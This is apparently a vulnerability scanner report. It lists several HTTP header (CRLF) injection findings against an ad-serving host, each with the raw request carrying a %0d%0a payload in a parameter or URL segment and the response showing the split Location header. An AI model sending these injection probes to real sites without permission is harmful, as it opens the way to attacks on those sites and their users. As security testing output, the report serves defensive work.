GET /h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/http:/pixel.quantserve.com/r;a=p-5aa_ooycXTWzY;labels=_click.adserver.doubleclick*http://local.nissanusa.com/zip.aspx?regionalZipCode=null&vehicle=altima&dcp=zmm.57350078.&dcc=b2393%0d%0a04e19a6bbd5 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=aYnhU0yKaYg5nZaunJubZdIcfK3FPbosjRUvXZcwWK3wy2E33yHfmHUyZdkakpAZc3JqZdn9JG9QVcZbEuQ8vyg9DhkdLnnBFVBnlBeZcSbuV3lYr8KaqSWZa4MTHnbQGDI2HOo9HKTGgZaEih9TCDFjrnQR7RfEfkjed13SctCuZcjjKWOLTq4nqAZdegOYZdZbdOA3ixAMvfNHecobGDZbgZdOFGnVtjLn9IEoGaGBooFyqBFgOLtsUNQ2ZdRNZdW1CfcsNdWMkvcZbiGteaWHkDwc1qH2Yy5xuHXlZb0YbLxjaUYVfAcUvcTDZcaw6gPHjZbpZbK8FgxZasA5DYg27PcwdudngZdmOtFu2BdNMhZdXZcLg5fuEicO5VKfnBhHQtqVXKpFFjXt1LkZabMZak2HGVZcMwQrhvS941ncUyiMG9fnEVu2ZcjZbjGnllTcWOtZcZbrbjcuMK44wROxIZaDjf6KSnIZahyL1HeeR6Xi6JojEp2cADnr8BF6; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 17:25:24 GMT;
Content-Type: text/html
Location: http:/pixel.quantserve.com/r;a=p-5aa_ooycXTWzY;labels=_click.adserver.doubleclick*http://local.nissanusa.com/zip.aspx?regionalZipCode=null&vehicle=altima&dcp=zmm.57350078.&dcc=b2393
04e19a6bbd5
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/http:/pixel.quantserve.com/r

Issue detail

The value of the dcp request parameter is copied into the Location response header. The payload 5c9bc%0d%0ab7d0a7d3b63 was submitted in the dcp parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/http:/pixel.quantserve.com/r;a=p-5aa_ooycXTWzY;labels=_click.adserver.doubleclick*http://local.nissanusa.com/zip.aspx?regionalZipCode=null&vehicle=altima&dcp=5c9bc%0d%0ab7d0a7d3b63&dcc=40424790.233402132 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=a2nhU0P3r8ZaeP1qCnMqQvhXP9Zb1Hm4my2hwgSSEEfe4aTXF9X30Zc7Ocn6XsRenFTLPfnvLBsHDv2vpUonjxs5l0UllVBRV6EkUY5uRlso3cTnoMYJZcFsQHZcg68bdVNRcthtZdNfmhcGvgfU5A70cGrccnFolMy0iH6eA3Zbg9GOno3yuI0mHpKZbqP2ZckcluBXPtNQ3ZcxXemgmA3up26LgTyZdbQOrrKS8vZbqGEJQmsq2hVZb93x3ROj1o8UqLn0gaX9GkUlZb1Zc4fn6RqMtkmZcQ4Zck8vrUqhccWmjZcYB5k9IahjqG6LD7FabFMpfZcDhClmJ2j8B92pftZdCbyglsHjvmfyRbHEsCKZcwM0o9rWXPnZdjn69SBx1PBZbFudjOtZaZdxhK7wl566OPT3MbCeG78LEIFuXTZdtirhkrHaJqEZcNTldFEK2vTHZbjQjwZa5YYaVZdtddnwZcZcNVENjyla77fJb6mRbTdtnCmnvpVM; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 17:25:07 GMT;
Content-Type: text/html
Location: http:/pixel.quantserve.com/r;a=p-5aa_ooycXTWzY;labels=_click.adserver.doubleclick*http://local.nissanusa.com/zip.aspx?regionalZipCode=null&vehicle=altima&dcp=5c9bc
b7d0a7d3b63&dcc=40424790.233402132
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/http:/pixel.quantserve.com/r

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 3e6ac%0d%0a9377000351 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/http:/pixel.quantserve.com/r?3e6ac%0d%0a9377000351=1 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=amnh31y4ZaZaeaTxrSZbwIf2PA5jdxHdnZbmrMP5qBJMDUpnr63dvKGWPbeVsBEiFgrZdrrZbcparaBR5Qgi2edfIZdDOMCYQQQufIISsIxoZalKQphp5ZcCZaNewSenAeXSumshSUZctnICF5kjJpecRxAMQuSmKSNsdbvo74ZdZa36AhIcPRBXbZaosO7ViUFp8xZcuTVkBGQWueaRxOwUZakHSmxM6c3ZcoZaUbjopj4rZcXCK53wZaPdBf3mXelIJtClNrZaRo4VnpSgtI2jdGxohFoUGVad8p4uSGHHeh18XU6ja0fkFgi5HtZbUUkjcZbMJZaIZc9iI7qEM1wh2bAo4tZbapcJmhyPVECa3cuMZcte5hpFIaWafZaWYUoj0xVWHb80Yk53hKAswsnZaXBZc8Y6W8L3wFOsVKEUPUo9jBR3xYokBe1Zbg2vxm8mpAoBtv6oZaR3I4A3WZaeKFeCobjEAht0ONOy1f4WdeK30cnxrfyW9HqNS; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 17:24:34 GMT;
Content-Type: text/html
Location: http:/pixel.quantserve.com/r?3e6ac
9377000351=1
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/http:/pixel.quantserve.com/r

Issue detail

The value of the vehicle request parameter is copied into the Location response header. The payload b3f74%0d%0a884d93094bb was submitted in the vehicle parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/http:/pixel.quantserve.com/r;a=p-5aa_ooycXTWzY;labels=_click.adserver.doubleclick*http://local.nissanusa.com/zip.aspx?regionalZipCode=null&vehicle=b3f74%0d%0a884d93094bb&dcp=zmm.57350078.&dcc=40424790.233402132 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=aMnhU0R3Y7ALfDPBMPikUZa2A2fia21TYZa1qupgjdEqT5EmNtWD3oD66ZdpEk5l6TkvUJsnB2CaBp33b00nu9Yew2EoNkK2dLa42m70jbmoLBvREaLC8wZdQxPONQly6yIu2obgkxy0jJednCW4BJi4RhvYI57HOmLX1d1edsePii0GroZaNdXDPP41PRZcjPiKxCyWCZa9Ce8BSHkdXP2iC3QMk7jFZa4rEmi7gWNuca1SNRPRRXVyKDNIjZdSftLvQaAfMHUDbBIpwKupK3vHK8mHOZdaO4xnF38JocEyh71ga1BJntDIXAJF9qfE739eCZc2w4DsquMLZcX1kASIl4EvjZdjZbKjxrjj5ISw8E3TuZdOn0TZdGbmZauuNoNrZbB8NtNZcPOC0ZbyZbO7GZdBweXb1BSMKHxPw5JGlqJOeJOe6bD2YBeG3pBikogvQ2nLHNyggiNsMckU0gfFr9jkuPBZcSJ3Zc5nmBHb7Y20Eady; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 17:24:51 GMT;
Content-Type: text/html
Location: http:/pixel.quantserve.com/r;a=p-5aa_ooycXTWzY;labels=_click.adserver.doubleclick*http://local.nissanusa.com/zip.aspx?regionalZipCode=null&vehicle=b3f74
884d93094bb&dcp=zmm.57350078.&dcc=40424790.233402132
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 26972%0d%0a53a2f8f14bb was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/?26972%0d%0a53a2f8f14bb=1 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=aQnFseo0P8p8mTNj3wUZaaM0s7a0EnHEnP443sV3OxG24fZdFVF4WrXx3GaavnqGbacELgIg0cxBWwGCMCyayWTP1EpAHFtaKeCarp4w4Za7NaL58oQ3vZcZdonaTLBblwrtZcEJDwJIZcuGauDUZcuDTxB4yVjLiZb1kkSSC8GZdYsN5QBU0PmsVXPU8vqaurCZbQ4u0wsd0TAOZdgArhmdc7Tm9rSZaBp7Vmg2ZcGYUJkvHZaZcflZaSxGbgZbuChSayHgxEZd6Za2FtrUMTk6YKnsvsrDjGEjLhHFl2FmP4e6yRMJecFyH2GGv6Bv7D951qkktDaJxtBdbOl1MWOhaWSTHZdgOLTZcJMNndG2H8s9TWuPSZbJ31TJ50kRyyTrAYU2x0NoTjZcnMPke5kQTIXORhWsGWNc9DinF3xKnFRt7tq63OeWlOCgCQBp6No1ctMRqCNXbORSQqbFXA1qIZbMLiEBGMX421JVZcuvHRMpASBN4OpspR7qZaLpL1RFAFCmIoNbf4RbiQQ5YQ4RT1UUcat0wiX6B2c66VhAPlZbZbI9oZceRY1uXjb1cS35ieafqE5gRgbx8cADArlKwdUTcElEM6; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:38:45 GMT;
Content-Type: text/html
Location: ?26972
53a2f8f14bb=1
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/

Issue detail

The value of the ord request parameter is copied into the Location response header. The payload 289df%0d%0af5f35e76bbb was submitted in the ord parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/;ord=289df%0d%0af5f35e76bbb HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=avnFsetMPm5rTgUyMAViQGXRj2XFiSZdW6ruZckmWfWkP5fEKbBOxEM3WdZaBv6Zad9mGUIuyv1rZcFTKo1n96DqoQXtUGgHaRTCOLQwbc4P2UpKxK7yQZbRdZbHj87Sx6M98nZbEfBJrvK5KB3QBeM92UFObRbhTPS4GkoC4LFwoU09EquWu1mITmZcxMVUVxST36WvQxSqplHisUs1cxL07LlwMQDbViUPlDgPiG6C3ghe3WQddkDp6dUhXdbuc1QKjfcQnicfFBLqQvaYTJulyhQEb0dHT2cg77GslXZb9l5wZaPUIZbu7Iii5FC5RbkeSRBs34fZd3GyvPERHoLfZdOZbCe7YvCDThpSJTs3610AeTCnxTNcnRa6DWUZaPpyHIhxfHUynIeRTe0Zak0SQKo1qtbfQZbpOheB0WYgyPrCJWSoIJGwEBb5P2k01CmdR0iZbOmeg6GAZbXSTE3uyZaHm3Fr3G9X5P9k9jDES3BR4sFstJjJ0WJ2DBgaAqGv2flQsF9RpLeWlNFOnET9RCxfO6SmnE4Mw6gijup7VCPPXGiSLUmAAFvcNIBuF573Y70ZcWbbIKHlVsjr0gOvZaO; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:38:41 GMT;
Content-Type: text/html
Location: ;ord=289df
f5f35e76bbb
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/http:/pixel.quantserve.com/r

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload c44f8%0d%0a5a08a3ec162 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/c44f8%0d%0a5a08a3ec162/pixel.quantserve.com/r HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=aHnEZcdolXVsnuWxkJ4wZdY3rC3r2HJEFPahvx8rNf5ZcxNF1ZbdrlWdqMUom14PXjisZc1B02NPUwJqf4mtB2dqWFby9chZdrwGHfgVrCND1LQBAZa8jwmZbHZcOV2fnNX71D6rLmZcKuFaCXZcpvQXHts62HiTAcvmERio9nG0yDLcK59B3trFZdmg2VGgTCqbZcf5OYcrDcbtoxdbPvktEDZaNQkxwiP46aPv1ZbC12vGgblpEgMZdjZdtVVw6LIeuVarWHuB2JdtRXvAFFYnDnCmPbFBk5ZdeGRygEiZdk9EQye2S80SObP3ecYZbWhceZdPR6rZaEr6twsvX8ndB4ZdKUBnvPfXruZb1jZcGCkOZbEJqtwlZbs3UZbqB34FMhKMNPPDQr3UQAHIrSRPYV050Nu90yWovEFoBfjSat6mgQeUTFJfXZbox1uM9JZc2ZaYsPjEwxBJ00iDF3LZbMBOBvbG2ZaVp8IOtS9S5roTSF0phh2qVbnr8bHvFXf0WTbPXnP70CZbWpb1NZddE4XGAYO4DCgac0q3h0dBLElMZbx6qTNqrnw9k0bFX7JOd8DlBwDTRLritDXVCZcWakkmxgAHZcbysr; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:39:31 GMT;
Content-Type: text/html
Location: c44f8
5a08a3ec162/pixel.quantserve.com/r
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/http:/pixel.quantserve.com/r

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload e3bb1%0d%0a8e9ee6e06df was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/http:/e3bb1%0d%0a8e9ee6e06df/r HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
